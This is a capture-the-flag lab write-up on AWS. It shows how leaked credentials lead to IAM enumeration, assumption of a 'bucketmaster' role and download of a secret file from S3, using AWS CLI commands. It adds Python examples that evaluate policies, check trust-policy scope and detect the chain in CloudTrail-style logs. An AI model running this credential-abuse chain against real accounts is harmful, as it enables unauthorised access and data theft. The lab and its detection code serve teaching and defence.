Advent of Cyber 2025 - Day 23 - AWS Security - S3cret Santa

 

☁️ Day 23: Reclaiming the Cloud – An AWS IAM Adventure 🏰🔐

🌟 Introduction

Deep inside the Kingdom of Wareville, one of TBFC’s stealthiest elves pulled off an incredible infiltration 🕵️‍♂️. Hopping quietly into Sir Carrotbane’s office, the elf discovered a shocking sight — cloud credentials casually lying on the desktop like forgotten carrots 🥕💻.

The mission was clear:
👉 Use these credentials
👉 Regain access to TBFC’s cloud network
👉 Uncover hidden secrets in the cloud ☁️

Let’s walk through how this cloud infiltration unfolded using AWS IAM and the AWS CLI 🚀


🎯 Learning Objectives

By the end of this mission, we learned how to:

  • 🧠 Understand AWS accounts & IAM

  • 🔍 Enumerate permissions from an attacker’s perspective

  • 💻 Use the AWS CLI

  • 🎭 Assume roles to escalate privileges

  • 📦 Access sensitive data from Amazon S3


🔌 Lab Setup & AWS CLI Configuration

AWS allows programmatic access using:

  • Access Key ID

  • Secret Access Key

These credentials were already configured in:

~/.aws/credentials

To confirm that they still worked, we called AWS STS:

aws sts get-caller-identity

This call needs no IAM permissions, so it is the standard first check for any key pair: it answers whether the key is active and which account and identity it belongs to.

✅ Result:

🎉 The credentials were valid and belonged to:

sir.carrotbane

The elf was delighted — cloud access restored! 😄☁️


🧩 IAM Explained (Users, Groups, Roles & Policies)

👤 IAM Users

A user represents an individual identity with specific permissions.

➡️ Example: Sir Carrotbane


👥 IAM Groups

Groups simplify permission management by assigning policies to multiple users at once.

➡️ Example: Carrotbane’s army


🎭 IAM Roles

Roles carry permissions but have no long-term credentials of their own; an identity assumes a role when needed and receives temporary credentials for it.

➡️ Sir Carrotbane switching roles based on the battle ⚔️🛡️


📜 IAM Policies

Policies define:

  • What actions are allowed

  • Which resources

  • Under what conditions

  • For whom

💡 Correct Answer:
Policy is the IAM component that defines permissions.


๐Ÿ” Enumerating Sir Carrotbane’s Permissions

๐Ÿ‘ฅ Listing Users

aws iam list-users

๐Ÿ“œ Checking Inline Policies

aws iam list-user-policies --user-name sir.carrotbane

✔️ Found an inline policy!


๐Ÿ“Ž Attached Policies?

aws iam list-attached-user-policies --user-name sir.carrotbane

❌ None found.


๐Ÿ‘ฅ Group Membership?

aws iam list-groups-for-user --user-name sir.carrotbane

❌ Not part of any group.


๐Ÿง  Inspecting the Inline Policy

aws iam get-user-policy --policy-name SirCarrotbanePolicy --user-name sir.carrotbane

๐Ÿ”Ž The policy allowed:

  • Listing users, groups, roles

  • Reading IAM policies

  • Assuming roles using sts:AssumeRole ๐ŸŽฏ

๐Ÿ’ก Correct Answer:
SirCarrotbanePolicy
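As an added example (not code from the TryHackMe room or from this write-up), the following Python evaluates a policy document the way the enumeration above reads it by hand, and answers the reviewer's question behind the next step: which roles can this user pivot into? The policy text is constructed from the three capabilities the write-up lists for SirCarrotbanePolicy; the real policy's statement layout, wildcards and resource ARN are not on the page, so treat them as assumptions. The evaluator is deliberately simplified: explicit Deny beats Allow, '*' and '?' wildcards in Action and Resource are honoured, and Condition, NotAction and NotResource are ignored.

```python
import fnmatch
import json

# Constructed policy document modelled on the three things the write-up says
# SirCarrotbanePolicy allows (list IAM identities, read IAM policies, assume a
# role). The statement layout and the resource ARN are assumptions, not the
# lab's real policy text.
SIR_CARROTBANE_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "EnumerateIam",
      "Effect": "Allow",
      "Action": ["iam:List*", "iam:Get*"],
      "Resource": "*"
    },
    {
      "Sid": "AssumeBucketmaster",
      "Effect": "Allow",
      "Action": "sts:AssumeRole",
      "Resource": "arn:aws:iam::123456789012:role/bucketmaster"
    }
  ]
}
""")


def _as_list(value):
    """IAM accepts a string or a list in Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(patterns, candidate, ignore_case):
    """IAM wildcards are '*' and '?'. Action names match case-insensitively,
    resource ARNs are compared case-sensitively."""
    if ignore_case:
        candidate = candidate.lower()
        patterns = [p.lower() for p in patterns]
    return any(fnmatch.fnmatchcase(candidate, p) for p in patterns)


def evaluate(policy, action, resource):
    """Decide one (action, resource) pair against one identity policy.

    Returns 'Allow', 'Deny' or 'ImplicitDeny'. Simplified model: an explicit
    Deny wins, otherwise any matching Allow wins, otherwise implicit deny.
    Condition, NotAction and NotResource are not modelled.
    """
    decision = "ImplicitDeny"
    for stmt in _as_list(policy.get("Statement")):
        if not _matches(_as_list(stmt.get("Action")), action, ignore_case=True):
            continue
        if not _matches(_as_list(stmt.get("Resource")), resource, ignore_case=False):
            continue
        if stmt.get("Effect") == "Deny":
            return "Deny"
        if stmt.get("Effect") == "Allow":
            decision = "Allow"
    return decision


def assumable_role_patterns(policy):
    """Collect the Resource entries of Allow statements that cover sts:AssumeRole.

    A '*' here means any role whose trust policy accepts this user, which is
    the finding a permissions review should escalate.
    """
    patterns = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if _matches(_as_list(stmt.get("Action")), "sts:AssumeRole", ignore_case=True):
            patterns.extend(_as_list(stmt.get("Resource")))
    return patterns


if __name__ == "__main__":
    checks = [
        ("iam:ListUsers", "*"),
        ("sts:AssumeRole", "arn:aws:iam::123456789012:role/bucketmaster"),
        ("sts:AssumeRole", "arn:aws:iam::123456789012:role/admin"),
        ("s3:GetObject", "arn:aws:s3:::easter-secrets-123145/cloud_password.txt"),
    ]
    for action, resource in checks:
        print(f"{action:16} {resource:60} -> {evaluate(SIR_CARROTBANE_POLICY, action, resource)}")
    print("assumable:", assumable_role_patterns(SIR_CARROTBANE_POLICY))
```

Run it as a script to see that the constructed policy grants the IAM reads and the one AssumeRole but nothing on S3 directly, which is exactly why the role, not the user, becomes the target of the next section.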


🎭 Assuming Roles – The Turning Point

🔍 Enumerating Roles

aws iam list-roles

🎉 Jackpot!
A role named bucketmaster could be assumed by sir.carrotbane. (The list-roles output includes each role’s trust policy, the AssumeRolePolicyDocument, which is where the principals allowed to assume it are listed.)


📜 Checking Role Policies

aws iam get-role-policy --role-name bucketmaster --policy-name BucketMasterPolicy

🔑 Permissions unlocked:

  • s3:ListAllMyBuckets

  • s3:ListBucket

  • s3:GetObject

💡 Correct Answer:
ListAllMyBuckets


🔐 Assuming the Bucketmaster Role

aws sts assume-role \
  --role-arn arn:aws:iam::123456789012:role/bucketmaster \
  --role-session-name TBFC

🧾 Temporary credentials were generated:

  • AccessKeyId

  • SecretAccessKey

  • SessionToken

These were exported to the environment, officially upgrading our access 🚀
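As an added example, not part of the write-up, this Python shows the two halves of the step above: mapping the three fields of an assume-role response onto the environment variables the AWS CLI reads, and the check a defender runs on the same role, namely whether its trust policy is scoped to one named identity or open to the whole account. The STS response and the bucketmaster trust policy are both constructed; the write-up only says the role could be assumed by sir.carrotbane, and the credential values are obvious placeholders.

```python
import json

# Constructed sample of an `aws sts assume-role` response. The key values are
# obvious placeholders, not credentials from the lab.
ASSUME_ROLE_RESPONSE = json.loads("""
{
  "Credentials": {
    "AccessKeyId": "ASIAEXAMPLEKEYID0000",
    "SecretAccessKey": "EXAMPLE-SECRET-ACCESS-KEY",
    "SessionToken": "EXAMPLE-SESSION-TOKEN",
    "Expiration": "2025-12-23T12:00:00+00:00"
  },
  "AssumedRoleUser": {
    "AssumedRoleId": "AROAEXAMPLEROLEID:TBFC",
    "Arn": "arn:aws:sts::123456789012:assumed-role/bucketmaster/TBFC"
  }
}
""")

# Constructed trust policy for the bucketmaster role. The write-up only says
# sir.carrotbane could assume the role, so this document is an assumption.
BUCKETMASTER_TRUST_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::123456789012:user/sir.carrotbane"},
      "Action": "sts:AssumeRole"
    }
  ]
}
""")

# Field in the STS response -> environment variable the AWS CLI and SDKs read.
ENV_NAMES = {
    "AccessKeyId": "AWS_ACCESS_KEY_ID",
    "SecretAccessKey": "AWS_SECRET_ACCESS_KEY",
    "SessionToken": "AWS_SESSION_TOKEN",
}


def _as_list(value):
    """IAM accepts a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def credentials_to_env(response):
    """Map the three temporary credentials onto the CLI's environment variables.

    All three are needed: an STS access key and secret are rejected without
    the matching session token.
    """
    creds = response["Credentials"]
    return {env: creds[field] for field, env in ENV_NAMES.items()}


def export_lines(response):
    """Render POSIX `export` lines (single-quoted) for the temporary credentials."""
    return [f"export {name}='{value}'" for name, value in credentials_to_env(response).items()]


def trust_policy_findings(trust_policy, account_id):
    """Report principals in a role trust policy broader than one named identity.

    Whether bucketmaster is a controlled pivot or an open door is decided
    here, not in its permission policy: '*' or the account root principal
    means every identity in the account that holds sts:AssumeRole may use it.
    """
    findings = []
    for stmt in _as_list(trust_policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        if principal == "*":
            findings.append("any principal (Principal '*')")
            continue
        for p in _as_list((principal or {}).get("AWS")):
            if p == "*":
                findings.append("any AWS principal ('*')")
            elif p in (account_id, f"arn:aws:iam::{account_id}:root"):
                findings.append(f"any identity in account {account_id} with sts:AssumeRole")
    return findings


if __name__ == "__main__":
    for line in export_lines(ASSUME_ROLE_RESPONSE):
        print(line)
    found = trust_policy_findings(BUCKETMASTER_TRUST_POLICY, "123456789012")
    print("trust policy findings:", found or "none, scoped to one user")
```

Temporary credentials carry an Expiration; once it passes, the exported variables stop working and a fresh assume-role call is needed, which is also why each assumption shows up as its own STS event in CloudTrail.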


📦 Exploring Amazon S3

☁️ What is S3?

Amazon Simple Storage Service (S3) is cloud object storage used for:

  • 📄 Documents

  • 🖼️ Images

  • 📦 Backups

  • 🧾 Logs

Everything is stored inside Buckets 🪣


📋 Listing Buckets

aws s3api list-buckets

👀 A suspicious bucket appeared:

easter-secrets-123145

📂 Listing Objects

aws s3api list-objects --bucket easter-secrets-123145

🎯 A file stood out:

cloud_password.txt

📥 Downloading the Secret File

aws s3api get-object \
  --bucket easter-secrets-123145 \
  --key cloud_password.txt \
  cloud_password.txt

🏁 Mission Complete – Secret Revealed 🎉

📄 Contents of cloud_password.txt:

THM{more_like_sir_cloudbane}

💡 Correct Answer confirmed!


🧠 Final Thoughts

This lab perfectly demonstrates how misconfigured IAM permissions and role assumption can lead to serious cloud security breaches ☁️⚠️.

A single forgotten credential turned into:

  • IAM enumeration 🔍

  • Role escalation 🎭

  • Sensitive data exfiltration 📦

🛡️ Lesson learned:

Least privilege and proper IAM configuration are critical in cloud security.
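As an added example, not part of the write-up, here is what the same chain looks like from the defender's side. The events below are hand-constructed CloudTrail-style records, abbreviated to the fields the checks use, that mirror the commands run above; they are not logs from the lab. The two checks flag a burst of IAM read calls by one user and any GetObject against a watch-listed bucket, attributing the read back to the IAM user who assumed the role.

```python
ACCOUNT = "123456789012"

# Constructed identities, mirroring the write-up's user and role session.
USER = {
    "type": "IAMUser",
    "arn": f"arn:aws:iam::{ACCOUNT}:user/sir.carrotbane",
    "userName": "sir.carrotbane",
}
ROLE_SESSION_ARN = f"arn:aws:sts::{ACCOUNT}:assumed-role/bucketmaster/TBFC"
SESSION = {
    "type": "AssumedRole",
    "arn": ROLE_SESSION_ARN,
    "sessionContext": {"sessionIssuer": {"type": "Role", "userName": "bucketmaster"}},
}


def _event(time, source, name, identity, request=None, response=None):
    """Build an abbreviated CloudTrail-style record with only the fields used below."""
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "userIdentity": identity, "requestParameters": request or {},
            "responseElements": response}


# Hand-constructed sample events in the order the write-up ran the commands.
SAMPLE_EVENTS = [
    _event("2025-12-23T10:00:01Z", "sts.amazonaws.com", "GetCallerIdentity", USER),
    _event("2025-12-23T10:00:05Z", "iam.amazonaws.com", "ListUsers", USER),
    _event("2025-12-23T10:00:09Z", "iam.amazonaws.com", "ListUserPolicies", USER,
           {"userName": "sir.carrotbane"}),
    _event("2025-12-23T10:00:12Z", "iam.amazonaws.com", "ListAttachedUserPolicies", USER,
           {"userName": "sir.carrotbane"}),
    _event("2025-12-23T10:00:15Z", "iam.amazonaws.com", "ListGroupsForUser", USER,
           {"userName": "sir.carrotbane"}),
    _event("2025-12-23T10:00:20Z", "iam.amazonaws.com", "GetUserPolicy", USER,
           {"userName": "sir.carrotbane", "policyName": "SirCarrotbanePolicy"}),
    _event("2025-12-23T10:00:30Z", "iam.amazonaws.com", "ListRoles", USER),
    _event("2025-12-23T10:00:40Z", "iam.amazonaws.com", "GetRolePolicy", USER,
           {"roleName": "bucketmaster", "policyName": "BucketMasterPolicy"}),
    _event("2025-12-23T10:01:00Z", "sts.amazonaws.com", "AssumeRole", USER,
           {"roleArn": f"arn:aws:iam::{ACCOUNT}:role/bucketmaster", "roleSessionName": "TBFC"},
           {"assumedRoleUser": {"arn": ROLE_SESSION_ARN}}),
    _event("2025-12-23T10:01:10Z", "s3.amazonaws.com", "ListBuckets", SESSION),
    _event("2025-12-23T10:01:20Z", "s3.amazonaws.com", "ListObjects", SESSION,
           {"bucketName": "easter-secrets-123145"}),
    _event("2025-12-23T10:01:30Z", "s3.amazonaws.com", "GetObject", SESSION,
           {"bucketName": "easter-secrets-123145", "key": "cloud_password.txt"}),
]

ENUM_PREFIXES = ("List", "Get")


def iam_enumeration_counts(events):
    """Count IAM List*/Get* calls per principal. A burst from one user is the
    first visible step of the chain described above."""
    counts = {}
    for e in events:
        if e["eventSource"] == "iam.amazonaws.com" and e["eventName"].startswith(ENUM_PREFIXES):
            who = e["userIdentity"].get("userName") or e["userIdentity"].get("arn")
            counts[who] = counts.get(who, 0) + 1
    return counts


def role_session_origins(events):
    """Map each assumed-role session ARN back to the identity that called AssumeRole."""
    origins = {}
    for e in events:
        if (e["eventSource"] == "sts.amazonaws.com" and e["eventName"] == "AssumeRole"
                and e["responseElements"]):
            session_arn = e["responseElements"]["assumedRoleUser"]["arn"]
            origins[session_arn] = e["userIdentity"].get("arn")
    return origins


def sensitive_reads(events, sensitive_buckets):
    """Return GetObject events against watch-listed buckets, attributed to the
    original user when the read came through an assumed role."""
    origins = role_session_origins(events)
    hits = []
    for e in events:
        if e["eventSource"] != "s3.amazonaws.com" or e["eventName"] != "GetObject":
            continue
        bucket = e["requestParameters"].get("bucketName")
        if bucket not in sensitive_buckets:
            continue
        session_arn = e["userIdentity"].get("arn")
        hits.append({"time": e["eventTime"], "bucket": bucket,
                     "key": e["requestParameters"].get("key"),
                     "session": session_arn, "assumed_by": origins.get(session_arn)})
    return hits


if __name__ == "__main__":
    print("IAM enumeration per principal:", iam_enumeration_counts(SAMPLE_EVENTS))
    for hit in sensitive_reads(SAMPLE_EVENTS, {"easter-secrets-123145"}):
        print("sensitive read:", hit)
```

One caveat before relying on the second check: AssumeRole and the IAM calls are management events, which CloudTrail records by default, but GetObject and ListObjects are S3 data events and only appear when data event logging is enabled for the bucket or trail.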
